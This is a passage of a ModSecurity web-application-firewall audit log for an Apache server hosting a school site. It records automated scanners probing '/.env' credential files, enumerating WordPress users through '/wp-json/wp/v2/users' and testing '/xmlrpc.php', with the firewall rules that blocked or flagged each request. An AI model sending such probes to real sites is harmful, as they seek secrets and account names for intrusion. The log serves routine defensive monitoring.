[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331562138764 3082 (- - -) Stopwatch2: 1746331562138764 3082; combined=1310, p1=452, p2=829, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d4f755-Z-- --4cfc8924-A-- [04/May/2025:11:06:10 +0700] aBbnsvnZiHJYHUAF8QfcTgAAAAw 103.236.140.4 36718 103.236.140.4 8181 --4cfc8924-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4cfc8924-C-- demo.sayHello --4cfc8924-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cfc8924-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331570643973 5245 (- - -) Stopwatch2: 1746331570643973 5245; combined=3938, p1=535, p2=3199, p3=24, p4=24, p5=91, sr=140, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cfc8924-Z-- --1dc64c27-A-- [04/May/2025:11:07:32 +0700] aBboBPnZiHJYHUAF8QfcUAAAABA 103.236.140.4 36722 103.236.140.4 8181 --1dc64c27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1dc64c27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dc64c27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331652484898 3394 (- - -) Stopwatch2: 1746331652484898 3394; combined=1495, p1=528, p2=934, p3=0, p4=0, p5=32, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dc64c27-Z-- --f8d82c12-A-- [04/May/2025:11:07:38 +0700] aBboCuchPF6irSergtv9dwAAAMg 103.236.140.4 36726 103.236.140.4 8181 --f8d82c12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8d82c12-C-- demo.sayHello --f8d82c12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d82c12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331658770151 5765 (- - -) Stopwatch2: 1746331658770151 5765; combined=4270, p1=549, p2=3498, p3=32, p4=35, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d82c12-Z-- --9515cf69-A-- [04/May/2025:11:10:01 +0700] aBbomfnZiHJYHUAF8QfcVQAAAAM 103.236.140.4 36740 103.236.140.4 8181 --9515cf69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9515cf69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9515cf69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331801686229 2179 (- - -) Stopwatch2: 1746331801686229 2179; combined=897, p1=329, p2=545, p3=0, p4=0, p5=22, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9515cf69-Z-- --8fbfe56c-A-- [04/May/2025:11:10:08 +0700] aBbooPnZiHJYHUAF8QfcVgAAABQ 103.236.140.4 36744 103.236.140.4 8181 --8fbfe56c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8fbfe56c-C-- demo.sayHello --8fbfe56c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fbfe56c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331808011253 6072 (- - -) Stopwatch2: 1746331808011253 6072; combined=4435, p1=552, p2=3657, p3=32, p4=36, p5=94, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fbfe56c-Z-- --00230e38-A-- [04/May/2025:11:17:49 +0700] aBbqbfnZiHJYHUAF8QfcagAAAAs 103.236.140.4 36826 103.236.140.4 8181 --00230e38-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.225.181 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.225.181 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --00230e38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00230e38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746332269516626 756 (- - -) Stopwatch2: 1746332269516626 756; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00230e38-Z-- --2ec31b01-A-- [04/May/2025:11:22:36 +0700] aBbrjPnZiHJYHUAF8QfccQAAABU 103.236.140.4 36844 103.236.140.4 8181 --2ec31b01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ec31b01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ec31b01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746332556959188 2909 (- - -) Stopwatch2: 1746332556959188 2909; combined=1253, p1=431, p2=793, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ec31b01-Z-- --fdf57474-A-- [04/May/2025:11:22:45 +0700] aBbrlWJEE9ao5dcyYWnvIwAAAJU 103.236.140.4 36848 103.236.140.4 8181 --fdf57474-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fdf57474-C-- demo.sayHello --fdf57474-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf57474-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746332565078594 5727 (- - -) Stopwatch2: 1746332565078594 5727; combined=4156, p1=555, p2=3381, p3=32, p4=36, p5=91, sr=79, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf57474-Z-- --29998a1e-A-- [04/May/2025:11:31:32 +0700] aBbtpNsVQyl9V2B8Pt-xBwAAAEw 103.236.140.4 36958 103.236.140.4 8181 --29998a1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile Accept-Charset: utf-8 --29998a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29998a1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746333092717539 815 (- - -) Stopwatch2: 1746333092717539 815; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29998a1e-Z-- --a3973066-A-- [04/May/2025:11:35:54 +0700] aBbuqvnZiHJYHUAF8Qfc1QAAAAk 103.236.140.4 37208 103.236.140.4 8181 --a3973066-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; Lenovo K8 Note) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --a3973066-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3973066-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746333354715874 807 (- - -) Stopwatch2: 1746333354715874 807; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3973066-Z-- --6b1a2f53-A-- [04/May/2025:11:35:55 +0700] aBbuq_nZiHJYHUAF8Qfc1gAAAAo 103.236.140.4 37210 103.236.140.4 8181 --6b1a2f53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6b1a2f53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1a2f53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746333355110307 2905 (- - -) Stopwatch2: 1746333355110307 2905; combined=1227, p1=404, p2=786, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1a2f53-Z-- --3dff817d-A-- [04/May/2025:11:36:01 +0700] aBbusechPF6irSergtv9jgAAANg 103.236.140.4 37214 103.236.140.4 8181 --3dff817d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3dff817d-C-- demo.sayHello --3dff817d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dff817d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746333361045742 5344 (- - -) Stopwatch2: 1746333361045742 5344; combined=3716, p1=566, p2=2958, p3=26, p4=31, p5=80, sr=106, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dff817d-Z-- --0ee4ec1d-A-- [04/May/2025:11:36:09 +0700] aBbuufnZiHJYHUAF8Qfc2QAAAA0 103.236.140.4 37218 103.236.140.4 8181 --0ee4ec1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ee4ec1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ee4ec1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746333369300164 2380 (- - -) Stopwatch2: 1746333369300164 2380; combined=1051, p1=356, p2=664, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee4ec1d-Z-- --194fea5a-A-- [04/May/2025:11:36:17 +0700] aBbuwfnZiHJYHUAF8Qfc2wAAABA 103.236.140.4 37222 103.236.140.4 8181 --194fea5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --194fea5a-C-- demo.sayHello --194fea5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --194fea5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746333377334254 5218 (- - -) Stopwatch2: 1746333377334254 5218; combined=3911, p1=451, p2=3242, p3=25, p4=28, p5=96, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --194fea5a-Z-- --bb8de10d-A-- [04/May/2025:11:41:20 +0700] aBbv8NsVQyl9V2B8Pt-xFgAAAEI 103.236.140.4 37242 103.236.140.4 8181 --bb8de10d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb8de10d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb8de10d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746333680540861 3146 (- - -) Stopwatch2: 1746333680540861 3146; combined=1368, p1=461, p2=877, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb8de10d-Z-- --dc379650-A-- [04/May/2025:11:41:25 +0700] aBbv9fnZiHJYHUAF8Qfc4QAAAAc 103.236.140.4 37246 103.236.140.4 8181 --dc379650-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc379650-C-- demo.sayHello --dc379650-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc379650-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746333685248676 4952 (- - -) Stopwatch2: 1746333685248676 4952; combined=3888, p1=450, p2=3229, p3=28, p4=31, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc379650-Z-- --abb1e547-A-- [04/May/2025:11:43:07 +0700] aBbwW_nZiHJYHUAF8Qfc5QAAAAs 103.236.140.4 37258 103.236.140.4 8181 --abb1e547-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Accept-Charset: utf-8 --abb1e547-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abb1e547-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746333787185160 804 (- - -) Stopwatch2: 1746333787185160 804; combined=332, p1=298, p2=0, p3=0, 